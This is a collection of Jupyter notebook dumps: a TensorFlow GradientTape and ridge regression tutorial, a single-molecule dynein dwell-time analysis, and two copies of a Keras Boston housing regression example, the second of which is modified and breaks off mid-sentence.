accumulation.Reverse mode AD was first published in 1976 by Seppo Linnainmaa.Backpropagation of errors in multilayer perceptrons, a technique used in machine learning, is a special case of reverse mode AD. AD and Gradient Tape in TensorFlowThe `tf.GradientTape` records operations for automatic differentiation, computing the gradient of a computation with respect to its inputs. Operations are recorded if they are executed within this context manager and at least one of their inputs is being "watched". Tensorflow then uses that tape and the gradients associated with each recorded operation to compute the gradients of a "recorded" computation using *reverse accumulation* (explained above).E.g.Suppose we have the network for$$ y = x^2 $$We can compute analytically $\frac{dy}{dx}$ $$\frac{dy}{dx}=2x$$
###Code
x = tf.constant(5.0)
with tf.GradientTape() as t:
t.watch(x)
y = x * x
dy_dx = t.gradient(y, x)
print('dy_dx : ', dy_dx)
x = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
with tf.GradientTape() as t:
t.watch(x)
k = tf.matmul(x, x)
y = tf.add(k, tf.ones((2, 2)))
dy_dk = t.gradient(y, k)
print('dy_dk : ', dy_dx)
x = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
with tf.GradientTape(persistent=True) as t:
t.watch(x)
k = tf.matmul(x, x)
y = tf.add(k, tf.ones((2, 2)))
dy_dk = t.gradient(y, k)
dy_dx = t.gradient(y, x)
del t # Drop the rerefence to the tape when finished with it
print('dy_dk : ', dy_dx)
print('dy_dx : ', dy_dx)
###Output
dy_dk : tf.Tensor(
[[ 7. 11.]
[ 9. 13.]], shape=(2, 2), dtype=float32)
dy_dx : tf.Tensor(
[[ 7. 11.]
[ 9. 13.]], shape=(2, 2), dtype=float32)
###Markdown
Tapes record operations as they execute therefore they naturally handle Python control flow, such as `if` and `while`
###Code
def f(x, y):
output = 6.0
for i in range(y):
if i > 2 and i < 6:
output = tf.multiply(output, x)
return output
def grad(x, y):
with tf.GradientTape() as t:
t.watch(x)
out = f(x, y)
return t.gradient(out, x)
x = tf.Variable(2.0)
print(grad(x, 6))
print(grad(x, 5))
print(grad(x, 4))
x = tf.constant(3.0)
with tf.GradientTape() as g:
g.watch(x)
with tf.GradientTape() as gg:
gg.watch(x)
y = x * x
dy_dx = gg.gradient(y, x)
d2y_dx2 = g.gradient(dy_dx, x)
###Output
_____no_output_____
###Markdown
Ridge Regression with TensorFlowRecall that we looked at ridge regression in section 2, to recap:https://en.wikipedia.org/wiki/Tikhonov_regularization$y=wx_i$ where $w\in{\rm I\!R}^{n}$i.e. if dimensions $n=2$; $y_{i} = f(x_{i}) = \begin{bmatrix} w_{0}, w_{1} \end{bmatrix} \begin{bmatrix} x_{0} \\ x_{1} \end{bmatrix} = w_{0}x_{0} + w_{1}x_{1}$Model : $\hat{y}=\mathbf{X}w$Cost function : $$ J(w)= \sum_i (w^T x_i - y_i)^2 = {\bf ||} \mathbf{X} w-y {\bf ||}^2_{2} $$$$\min_{w} \, (\mathbf{y} - \mathbf{X} w)^\mathsf{T}(\mathbf{y} - \mathbf{X} w) $$$$\frac{\partial (\mathbf{y} - \mathbf{X} w)^\mathsf{T}(\mathbf{y} - \mathbf{X} w)}{\partial w}=-2X^T(y-\mathbf{X} w)$$$$\frac{\partial (\mathbf{y} - \mathbf{X} w)^\mathsf{T}(\mathbf{y} - \mathbf{X} w)}{\partial w}=-2X^T(y-\mathbf{X} w) = 0$$$$y=\mathbf{X} w$$ Solution with the Analytic (Exact algebraic solution)i.e. the analytical solution for the model parameters is to compute :$$w = \mathbf{X}^{-1} y$$
###Code
# Recall the Ridge Regression example from section 2-2
from sklearn import datasets
digits = datasets.load_digits()
(X, y) = datasets.load_digits(return_X_y=True)
# Split the labelled dataset into a training set and test set
index_to_split = -1
X_train = X[:index_to_split]
y_train = np.array([y[:index_to_split]])
X_test = X[index_to_split:]
y_test = np.array([y[index_to_split:]])
# Calculate the analytical solution
X_train_inv = tf.linalg.pinv(X_train)
y_train = tf.transpose(tf.Variable(y_train, dtype=tf.float64))
w = tf.matmul(X_train_inv, y_train)
print('w: {}'.format(w.numpy().flatten()))
# Test the model
y_hat = X_test @ w
print(y_hat)
print(w.shape)
print('y_hat: {}, rounds to {}'.format(y_hat, np.round(y_hat).item(0)))
print('Actual y label: {}'.format(y_test))
plt.figure()
plt.imshow(16 - digits.images[-1], cmap='gray')
plt.show()
###Output
y_hat: [[9.30939946]], rounds to 9.0
Actual y label: [[8]]
###Markdown
Solution with Batch Gradient Descent (Using TensorFlow)Lets train the ridge regression classifier this time using gradient descent, recall the gradient of the cost function is :$$ J(w)= \sum_i (w^T x_i - y_i)^2 = {\bf ||} \mathbf{X} w-y {\bf ||}^2_{2} $$Our update equation for $w$ is $$ w \leftarrow w - \eta \frac{\partial J(\bf{w}, y_i)}{\partial \bf{w}} $$We will use `tf.Variable`'s to represent the parameters of the model, and we can use `tf` methods to read and update the stored value such as `tf.assign_sub` etc. These are mutable in the tensorflow computation graph. We will do the following:1. Define the model2. Define a loss function3. Train using the training data and use an *optomizer* to adjust the variables to fit the dataTo recap our model is : $\hat{y}=\mathbf{X}w$
###Code
# 1. Defining our model
class RidgeRegression(object):
def __init__(self):
# Intialise parameter values
self.w = tf.Variable(tf.random.normal(
[64, 1], stddev=0.1, dtype=tf.float64, seed=0))
# Actual model
def __call__(self, X):
return X @ self.w
# 2. Define the loss function
def loss(target_y, predicted_y):
return tf.reduce_mean(tf.square(predicted_y - target_y))
# 3. Using gradient descent define a training function
def train(ridge_regression, train_X, train_y, learning_rate):
with tf.GradientTape() as t:
t.watch(ridge_regression.w)
current_loss = loss(train_y, ridge_regression(train_X))
dw = t.gradient(current_loss, ridge_regression.w)
ridge_regression.w.assign_add(- learning_rate * dw)
# # Putting it all together on the digits dataset
ridge_regression = RidgeRegression()
print('Starting loss : ', loss(y_train, ridge_regression(X_train)))
print('Lowest possible training loss : {}\n'.format(loss(y_train, X_train @ w)))
# Collect history of loss function
losses = []
epochs = range(200)
for epoch in epochs:
current_loss = loss(y_train, ridge_regression(X_train))
losses.append(current_loss)
train(ridge_regression, X_train, y_train, learning_rate=0.0001)
if epoch < 10 or epoch > 190:
print('Epoch {}: loss={}'.format(epoch, current_loss))
# Let's plot it all
plt.figure(figsize=(13, 13))
plt.plot(epochs, losses, 'r')
plt.plot([loss(y_train, X_train @ w)] * len(epochs), 'b--')
plt.legend(['Loss function', 'Lowest possible training loss'])
plt.xlabel('Epochs')
plt.ylabel('$J(w)$ Cost Function')
plt.show()
###Output
Starting loss : tf.Tensor(37.454681051980394, shape=(), dtype=float64)
Lowest possible training loss : 3.4116052683219555
Epoch 0: loss=37.454681051980394
Epoch 1: loss=22.40175169292075
Epoch 2: loss=18.855612649130098
Epoch 3: loss=17.80754147512685
Epoch 4: loss=17.310296654471557
Epoch 5: loss=16.94257095883113
Epoch 6: loss=16.61282246189918
Epoch 7: loss=16.300794683242827
Epoch 8: loss=16.00166054325713
Epoch 9: loss=15.713951059960158
Epoch 191: loss=5.404992943589579
Epoch 192: loss=5.395234940282464
Epoch 193: loss=5.3855673835957205
Epoch 194: loss=5.375988996111795
Epoch 195: loss=5.366498524016606
Epoch 196: loss=5.357094736573996
Epoch 197: loss=5.347776425613824
Epoch 198: loss=5.3385424050333015
Epoch 199: loss=5.329391510311208
|
notebooks/.ipynb_checkpoints/02_exp_1067_ATP-checkpoint.ipynb | ###Markdown
Finite-Window data* Filament: Axoneme-488* Dynein: 1067-SNAP-Cy3 diluted by 1000* Condition: 2 mM ATP in DAB (50 mM K-Ac, 10 mM Mg-Ac2)* Number of frame: 500* Total time = 27.3 sCreated on Wed May 15 07:49:41 2019 @author: Jongmin Sung
###Code
# Import library
from __future__ import division, print_function, absolute_import
import numpy as np
from PIL import Image
import matplotlib.pyplot as plt
%matplotlib inline
from matplotlib import cm
import sys
sys.path.append("../finite_window/finite_window")
import config
#from my_funcs import generate_trace, find_dwell
data_dir = config.data_dir
data_files = config.data_files
###Output
_____no_output_____
###Markdown
Read a movie file (*.tif)
###Code
# Open a time lapse movie
filename = 'Slide1_Axoneme488_1067-Cy3 by 1000_2mM ATP_no interval_1_MMStack_Default.ome.tif'
movie = Image.open(filename)
n_frame = movie.n_frames
n_row = movie.size[1]
n_col = movie.size[0]
print('File name = ', filename)
print('[frame, row, col] = [%d, %d, %d] \n' %(n_frame, n_row, n_col))
# Pixel intensity is saved in I[frame, row, col]
I_frame = np.zeros((n_frame, n_row, n_col), dtype=int)
for i in range(n_frame):
movie.seek(i) # Move to i-th frame
I_frame[i,] = np.array(movie, dtype=int)
###Output
_____no_output_____
###Markdown
Create a maximum projection image
###Code
# Maximum projection
I_max = np.max(I_frame, axis=0)
fig, ax = plt.subplots(figsize=(10, 10))
ax.imshow(I_max, cmap=cm.gray)
ax.set_title('Maximum intensity')
###Output
_____no_output_____
###Markdown
Find local maximum intensity peaks
###Code
# Find peaks from local maximum
from skimage.feature import peak_local_max
spot_size = 3
min_distance = 5
peaks = peak_local_max(I_max, min_distance)
n_peak = len(peaks[:, 1])
row = peaks[::-1,0]
col = peaks[::-1,1]
print('Found', n_peak, 'spots. ')
fig, ax = plt.subplots(figsize=(10, 10))
ax.imshow(I_max, cmap=cm.gray)
for i in range(n_peak):
ax.plot(col[i], row[i], 'ro', ms=3, alpha=0.5)
ax.set_title('Peaks = %d, Spot size = %d, Min_distance = %d' % (n_peak, spot_size, min_distance))
###Output
Found 1917 spots.
###Markdown
Get the intensity traces at each spot
###Code
I_peak = ['None']*n_peak
s = int(spot_size/2)
for i in range(n_peak):
I_peak[i] = np.mean(np.mean(I_frame[:,row[i]-s:row[i]+s,col[i]-s:col[i]+s], axis=2), axis=1) # Mean intensity around the peak
fig, (ax1, ax2) = plt.subplots(1,2,figsize=(15,5))
ax1.hist([I_peak[i].max() for i in range(n_peak)], 100, color='k', histtype='step', lw=1)
ax1.set_xlabel('Intensity')
ax1.set_ylabel('Occurrence')
ax1.set_title('Maximum intensity at each spot')
ax2.hist([I_peak[i].min() for i in range(n_peak)], 100, color='k', histtype='step', lw=1)
ax1.set_xlabel('Intensity')
ax1.set_ylabel('Occurrence')
ax2.set_title('Minimum intensity at each spot')
###Output
_____no_output_____
###Markdown
Normalize intensity traces at each spot
###Code
def lowpass(I, n):
m = int(n/2)
x = np.convolve(I, np.ones((n,))/n, mode='valid')
x0 = np.array(x[:m])
x1 = np.array(x[-m:])
return np.concatenate((x0, x, x1))
def normalize(I):
# Lowpass filter
I_lp = lowpass(I, 3)
# Normalize by min and max
I_lp = I_lp - np.min(I_lp)
I_lp = I_lp/np.max(I_lp)
# Renormalize by median of upper and lower parts
I_up = np.median(I[I_lp > 0.5])
I_low = np.median(I[I_lp < 0.5])
I_norm = (I - I_low)/(I_up - I_low)
return I_norm
I_peak = [normalize(I_peak[i]) for i in range(n_peak)]
###Output
C:\Users\Valelab\Anaconda2\lib\site-packages\ipykernel_launcher.py:19: RuntimeWarning: divide by zero encountered in true_divide
C:\Users\Valelab\Anaconda2\lib\site-packages\ipykernel_launcher.py:19: RuntimeWarning: invalid value encountered in true_divide
###Markdown
Check the noise level at each spot
###Code
def reject_outliers(data, m = 3.):
d = np.abs(data - np.median(data))
mdev = np.median(d)
s = d/mdev if mdev else 0.
return data[s<m]
def find_noise(I):
noise = I - lowpass(I, 3)
noise = reject_outliers(noise)
return np.std(noise)
noise = np.array([find_noise(I_peak[i]) for i in range(n_peak)])
fig, ax = plt.subplots(figsize=(10, 5))
ax.hist(noise[noise<1], 100, color='k', histtype='step', lw=1)
ax.set_xlabel('Noise')
ax.set_ylabel('Occurrence')
###Output
C:\Users\Valelab\Anaconda2\lib\site-packages\ipykernel_launcher.py:8: RuntimeWarning: invalid value encountered in subtract
C:\Users\Valelab\Anaconda2\lib\site-packages\ipykernel_launcher.py:5: RuntimeWarning: invalid value encountered in less
"""
C:\Users\Valelab\Anaconda2\lib\site-packages\ipykernel_launcher.py:15: RuntimeWarning: invalid value encountered in less
from ipykernel import kernelapp as app
###Markdown
Discard spots with high noise level
###Code
noise_cutoff = 0.2
I_mol = [I_peak[i] for i in range(n_peak) if noise[i] < noise_cutoff]
n_mol = len(I_mol)
print('Found %d molecules. Discarded %d spots.' %(n_mol, (n_peak-n_mol)))
###Output
Found 521 molecules. Discarded 1396 spots.
###Markdown
Show traces as an example
###Code
n_fig = 4
fig, ax = plt.subplots(1, n_fig, figsize=(4*n_fig, 5))
for i in range(n_fig):
ax[i].plot(I_mol[i], 'k', lw=1)
ax[i].axhline(y=1, ls='--', lw=1, c='k')
ax[i].axhline(y=0.5, ls='--', lw=1, c='k')
ax[i].axhline(y=0, ls='--', lw=1, c='k')
ax[i].set_xlabel('Frame')
ax[i].set_ylabel('Normalized intensity')
fig.tight_layout()
###Output
_____no_output_____
###Markdown
Lowpass filter (smothen) the signal
###Code
I_lp = [lowpass(I_mol[i], 3) for i in range(n_mol)]
fig, ax = plt.subplots(1, n_fig, figsize=(4*n_fig, 5))
for i in range(n_fig):
ax[i].plot(I_lp[i], 'b', lw=1)
ax[i].axhline(y=1, ls='--', lw=1, c='k')
ax[i].axhline(y=0.5, ls='--', lw=1, c='k')
ax[i].axhline(y=0, ls='--', lw=1, c='k')
ax[i].set_xlabel('Frame')
ax[i].set_ylabel('Smoothened intensity')
fig.tight_layout()
###Output
_____no_output_____
###Markdown
Find the traces using piecewise constant (PWC) algorithm Ref: Generalized Methods and Solvers for Noise Removal from Piecewise Constant Signals (2010)
###Code
# Use Jump Penalty algorithm among PWC since it is less sensitive to noise.
from pwc_jumppenalty import pwc_jumppenalty
from pwc_cluster import pwc_cluster
I_fit = ['None']*n_mol
for i in range(n_mol):
I_fit[i] = pwc_jumppenalty(I_lp[i], square=True, gamma=1.0, display=False, maxiter=10, full=False)
# I_fit[i] = pwc_cluster(I_mol[i], K=2, soft=False, beta=0.1, biased=True, display=False, stoptol=1e-5, maxiter=20) # Likelihood mean-shift
# Plot the fitting result
f, ax = plt.subplots(1, n_fig, figsize=(4*n_fig, 5))
for i in range(n_fig):
ax[i].plot(I_lp[i], 'b', lw=1)
ax[i].plot(I_fit[i], 'r', lw=3)
ax[i].axhline(y=1, ls='--', lw=1, c='k')
ax[i].axhline(y=0.5, ls='--', lw=1, c='k')
ax[i].axhline(y=0, ls='--', lw=1, c='k')
ax[i].set_xlabel('Frame')
ax[i].set_ylabel('Smoothened intensity')
ax[i].set_title('PWC fitting result')
f.tight_layout()
###Output
_____no_output_____
###Markdown
Define state [unbound, bound] = [0, 1] in each trace based on the PWC fitting result
###Code
# If I_fit > 0.5, then it is bound state. Otherwise, it is unbound state.
state = [I_fit[i] > 0.5 for i in range(n_mol)]
# Plot the fitting result
f, ax = plt.subplots(1, n_fig, figsize=(4*n_fig, 5))
for i in range(n_fig):
ax[i].plot(I_mol[i], 'k', lw=1)
ax[i].plot(state[i], 'r', lw=3)
ax[i].axhline(y=1, ls='--', lw=1, c='k')
ax[i].axhline(y=0.5, ls='--', lw=1, c='k')
ax[i].axhline(y=0, ls='--', lw=1, c='k')
ax[i].set_xlabel('Frame')
ax[i].set_ylabel('Intensity')
ax[i].set_title('Bound/Unbound states')
f.tight_layout()
###Output
_____no_output_____
###Markdown
Now, we find the dwell time from each trace
###Code
# Variable to save bound and unbound dwell
dwell = [] # Dwell time
for i in range(n_mol):
t_b = [] # Frame number at binding
t_u = [] # Frame number at unbinding
s = state[i] # State of ith molecule
for j in range(len(s)-1):
# Frame at binding
if (s[j] == False) & (s[j+1] == True):
t_b.append(j)
# Frame at unibnding
if (s[j] == True) & (s[j+1] == False):
t_u.append(j)
# Stop if there's no complete binding/unbinding
if len(t_b)*len(t_u) == 0:
continue
# Remove pre-existing binding
if t_u[0] < t_b[0]:
del t_u[0]
# Stop if there's no complete binding/unbinding
if len(t_b)*len(t_u) == 0:
continue
# Remove unfinished binding
if t_u[-1] < t_b[-1]:
del t_b[-1]
# Stop if there's no complete binding/unbinding
if len(t_b)*len(t_u) == 0:
continue
# Dwell time of each molecule
t_bu = [t_u[k] - t_b[k] for k in range(len(t_b))]
# Dwell time of overall molecules
dwell.extend(t_bu)
print('%d events are found.' %(len(dwell)))
###Output
857 events are found.
###Markdown
Histogram and mean dwell time
###Code
mean_dwell = np.mean(dwell)
bins = np.linspace(0, max(dwell), 20)
norm = len(dwell)*(bins[1]-bins[0])
t = np.linspace(min(dwell), max(dwell), 100)
exp_mean = np.exp(-t/mean_dwell)/mean_dwell
exp_mean = exp_mean*norm
fig, (ax1, ax2) = plt.subplots(1,2,figsize=(15,5))
ax1.hist(dwell, bins, color='k', histtype='step', lw=1)
ax1.plot(t, exp_mean, 'r')
ax1.set_xlabel('Frame')
ax1.set_ylabel('Occurrence')
ax1.set_title('Dwell time distribution (N = %d)' %(len(dwell)))
ax2.hist(dwell, bins, color='k', histtype='step', lw=1)
ax2.plot(t, exp_mean, 'r')
ax2.set_yscale('log')
ax2.set_xlabel('Frame')
ax2.set_ylabel('Occurrence')
ax2.set_title('Mean dwell time = %.1f [frame]' %(mean_dwell))
###Output
_____no_output_____
###Markdown
Finally, we got the mean dwell time of the entire molecules. Add drift correction Jupyter Github else?
###Code
import numpy
###Output
_____no_output_____ |
3.7-predicting-house-prices.ipynb | ###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
print(type(train_data))
print(train_data.mean(axis=0))
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
train_data
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best practice in such situations is to use K-fold cross-validation. It consists of splitting the available data into K partitions (typically K=4 or 5), then instantiating K identical models, and training each one on K-1 partitions while evaluating on the remaining partition. The validation score for the model used would then be the average of the K validation scores obtained. In terms of code, this is straightforward:
###Code
import numpy as np
k = 4
num_val_samples = len(train_data) // k
num_epochs = 100
all_scores = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
model.fit(partial_train_data, partial_train_targets,
epochs=num_epochs, batch_size=1, verbose=0)
# Evaluate the model on the validation data
val_mse, val_mae = model.evaluate(val_data, val_targets, verbose=0)
all_scores.append(val_mae)
all_scores
np.mean(all_scores)
###Output
_____no_output_____
###Markdown
As you can notice, the different runs do indeed show rather different validation scores, from 2.1 to 2.9. Their average (2.4) is a much more reliable metric than any single of these scores -- that's the entire point of K-fold cross-validation. In this case, we are off by \$2,400 on average, which is still significant considering that the prices range from \$10,000 to \$50,000. Let's try training the network for a bit longer: 500 epochs. To keep a record of how well the model did at each epoch, we will modify our training loop to save the per-epoch validation score log:
###Code
from keras import backend as K
# Some memory clean-up
K.clear_session()
num_epochs = 500
all_mae_histories = []
for i in range(k):
print('processing fold #', i)
# Prepare the validation data: data from partition # k
val_data = train_data[i * num_val_samples: (i + 1) * num_val_samples]
val_targets = train_targets[i * num_val_samples: (i + 1) * num_val_samples]
# Prepare the training data: data from all other partitions
partial_train_data = np.concatenate(
[train_data[:i * num_val_samples],
train_data[(i + 1) * num_val_samples:]],
axis=0)
partial_train_targets = np.concatenate(
[train_targets[:i * num_val_samples],
train_targets[(i + 1) * num_val_samples:]],
axis=0)
# Build the Keras model (already compiled)
model = build_model()
# Train the model (in silent mode, verbose=0)
history = model.fit(partial_train_data, partial_train_targets,
validation_data=(val_data, val_targets),
epochs=num_epochs, batch_size=1, verbose=0)
mae_history = history.history['val_mae']
all_mae_histories.append(mae_history)
###Output
processing fold # 0
processing fold # 1
processing fold # 2
processing fold # 3
###Markdown
We can then compute the average of the per-epoch MAE scores for all folds:
###Code
average_mae_history = [
np.mean([x[i] for x in all_mae_histories]) for i in range(num_epochs)]
###Output
_____no_output_____
###Markdown
Let's plot this:
###Code
import matplotlib.pyplot as plt
plt.plot(range(1, len(average_mae_history) + 1), average_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
It may be a bit hard to see the plot due to scaling issues and relatively high variance. Let's:* Omit the first 10 data points, which are on a different scale from the rest of the curve.* Replace each point with an exponential moving average of the previous points, to obtain a smooth curve.
###Code
def smooth_curve(points, factor=0.9):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
smooth_mae_history = smooth_curve(average_mae_history[10:])
plt.plot(range(1, len(smooth_mae_history) + 1), smooth_mae_history)
plt.xlabel('Epochs')
plt.ylabel('Validation MAE')
plt.show()
###Output
_____no_output_____
###Markdown
According to this plot, it seems that validation MAE stops improving significantly after 80 epochs. Past that point, we start overfitting.Once we are done tuning other parameters of our model (besides the number of epochs, we could also adjust the size of the hidden layers), we can train a final "production" model on all of the training data, with the best parameters, then look at its performance on the test data:
###Code
# Get a fresh, compiled model.
model = build_model()
# Train it on the entirety of the data.
model.fit(train_data, train_targets,
epochs=80, batch_size=16, verbose=0)
test_mse_score, test_mae_score = model.evaluate(test_data, test_targets)
test_mae_score
###Output
_____no_output_____
###Markdown
Predicting house prices: a regression exampleThis notebook contains the code samples found in Chapter 3, Section 6 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.----In our two previous examples, we were considering classification problems, where the goal was to predict a single discrete label of an input data point. Another common type of machine learning problem is "regression", which consists of predicting a continuous value instead of a discrete label. For instance, predicting the temperature tomorrow, given meteorological data, or predicting the time that a software project will take to complete, given its specifications.Do not mix up "regression" with the algorithm "logistic regression": confusingly, "logistic regression" is not a regression algorithm, it is a classification algorithm. The Boston Housing Price datasetWe will be attempting to predict the median price of homes in a given Boston suburb in the mid-1970s, given a few data points about the suburb at the time, such as the crime rate, the local property tax rate, etc.The dataset we will be using has another interesting difference from our two previous examples: it has very few data points, only 506 in total, split between 404 training samples and 102 test samples, and each "feature" in the input data (e.g. the crime rate is a feature) has a different scale. For instance some values are proportions, which take a values between 0 and 1, others take values between 1 and 12, others between 0 and 100...Let's take a look at the data:
###Code
from keras.datasets import boston_housing
(train_data, train_targets), (test_data, test_targets) = boston_housing.load_data()
train_data.shape
test_data.shape
###Output
_____no_output_____
###Markdown
As you can see, we have 404 training samples and 102 test samples. The data comprises 13 features. The 13 features in the input data are as follow:1. Per capita crime rate.2. Proportion of residential land zoned for lots over 25,000 square feet.3. Proportion of non-retail business acres per town.4. Charles River dummy variable (= 1 if tract bounds river; 0 otherwise).5. Nitric oxides concentration (parts per 10 million).6. Average number of rooms per dwelling.7. Proportion of owner-occupied units built prior to 1940.8. Weighted distances to five Boston employment centres.9. Index of accessibility to radial highways.10. Full-value property-tax rate per $10,000.11. Pupil-teacher ratio by town.12. 1000 * (Bk - 0.63) ** 2 where Bk is the proportion of Black people by town.13. % lower status of the population.The targets are the median values of owner-occupied homes, in thousands of dollars:
###Code
len(train_data[1])
train_data[1]
train_targets
###Output
_____no_output_____
###Markdown
The prices are typically between \$10,000 and \$50,000. If that sounds cheap, remember this was the mid-1970s, and these prices are not inflation-adjusted. Preparing the dataIt would be problematic to feed into a neural network values that all take wildly different ranges. The network might be able to automatically adapt to such heterogeneous data, but it would definitely make learning more difficult. A widespread best practice to deal with such data is to do feature-wise normalization: for each feature in the input data (a column in the input data matrix), we will subtract the mean of the feature and divide by the standard deviation, so that the feature will be centered around 0 and will have a unit standard deviation. This is easily done in Numpy:
###Code
from sklearn.preprocessing import StandardScaler, Normalizer
scaler = Normalizer()
train_data = scaler.fit_transform(train_data)
test_data = scaler.fit_transform(test_data)
mean = train_data.mean(axis=0)
train_data -= mean
std = train_data.std(axis=0)
train_data /= std
test_data -= mean
test_data /= std
train_data[1]
test_data[1]
test_sk[1] - test_data[1]
###Output
_____no_output_____
###Markdown
Note that the quantities that we use for normalizing the test data have been computed using the training data. We should never use in our workflow any quantity computed on the test data, even for something as simple as data normalization. Note that this is a simple step,also accomplished in a standardized way using StandardScaler from scikit-learn Building our networkBecause so few samples are available, we will be using a very small network with two hidden layers, each with 64 units. In general, the less training data you have, the worse overfitting will be, and using a small network is one way to mitigate overfitting.
###Code
from keras import models
from keras import layers
def build_model():
# Because we will need to instantiate
# the same model multiple times,
# we use a function to construct it.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu',
input_shape=(train_data.shape[1],)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(1))
model.compile(optimizer='rmsprop', loss='mse', metrics=['mae'])
return model
###Output
_____no_output_____
###Markdown
Our network ends with a single unit, and no activation (i.e. it will be linear layer). This is a typical setup for scalar regression (i.e. regression where we are trying to predict a single continuous value). Applying an activation function would constrain the range that the output can take; for instance if we applied a `sigmoid` activation function to our last layer, the network could only learn to predict values between 0 and 1. Here, because the last layer is purely linear, the network is free to learn to predict values in any range.Note that we are compiling the network with the `mse` loss function -- Mean Squared Error, the square of the difference between the predictions and the targets, a widely used loss function for regression problems.We are also monitoring a new metric during training: `mae`. This stands for Mean Absolute Error. It is simply the absolute value of the difference between the predictions and the targets. For instance, a MAE of 0.5 on this problem would mean that our predictions are off by \$500 on average. Validating our approach using K-fold validationTo evaluate our network while we keep adjusting its parameters (such as the number of epochs used for training), we could simply split the data into a training set and a validation set, as we were doing in our previous examples. However, because we have so few data points, the validation set would end up being very small (e.g. about 100 examples). A consequence is that our validation scores may change a lot depending on _which_ data points we choose to use for validation and which we choose for training, i.e. the validation scores may have a high _variance_ with regard to the validation split. This would prevent us from reliably evaluating our model.The best 